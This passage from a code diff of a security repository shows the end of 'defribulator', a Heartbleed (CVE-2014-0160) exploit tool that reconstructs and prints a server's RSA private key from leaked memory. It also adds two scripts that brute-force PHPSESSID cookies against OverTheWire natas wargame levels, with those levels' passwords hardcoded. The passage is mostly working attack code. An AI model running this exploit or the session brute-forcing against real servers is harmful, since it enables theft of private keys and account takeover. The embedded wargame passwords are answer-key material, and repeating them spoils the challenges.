dp = d % (p - 1)
dq = d % (q - 1)
qinv = gmpy.invert (q, p)
seq = Sequence()
for x in [0, n, e, d, p, q, dp, dq, qinv]:
seq.setComponentByPosition (len (seq), Integer (x))
print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq))
privkeydump = open("hb-certs/privkey_" + host + ".dmp", "a")
privkeydump.write(chunk)
return True
else:
return False
def main():
print "\ndefribulator v1.16"
print "A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)"
allresults = ''
# if a file is specified, loop through file
if opts.filein:
fileIN = open(opts.filein, "r")
for line in fileIN:
targetinfo = line.strip().split(":")
if len(targetinfo) > 1:
allresults = bleed(targetinfo[0], int(targetinfo[1]))
else:
allresults = bleed(targetinfo[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
fileIN.close()
else:
if len(args) < 1:
options.print_help()
return
allresults = bleed(args[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
print
if opts.rawoutfile:
rawfileOUT.close()
if opts.asciioutfile:
asciifileOUT.close()
if __name__ == '__main__':
main()

34
Web_Security/user_id/sqli_19_cookie_auth.py Normal file
View file

@ -0,0 +1,34 @@
#!/usr/bin/python
__author__ = "bt3gl"
__email__ = "bt33gl@gmail.com"
import requests
def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
for i in range(MAXID):
HEADER ={'Cookie':'PHPSESSID=' + str(i)}
r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
print(i)
if "You are an admin" in r.text:
print(r.text)
print(r.url)
if __name__ == '__main__':
AUTH = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
URL = 'http://natas18.natas.labs.overthewire.org/index.php?'
PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'})
MAXID = 640
brute_force_password(AUTH, URL, PAYLOAD, MAXID)

45
Web_Security/user_id/sqli_20_user_id_2.py Normal file
View file

@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3gl"
__email__ = "bt33gl@gmail.com"
import requests
def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
for i in range(MAXID):
HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
print(i)
if "You are an admin" in r.text:
print(r.text)
print(r.url)
if __name__ == '__main__':
AUTH = ('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
URL = 'http://natas19.natas.labs.overthewire.org/index.php?'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(AUTH, URL, PAYLOAD, MAXID)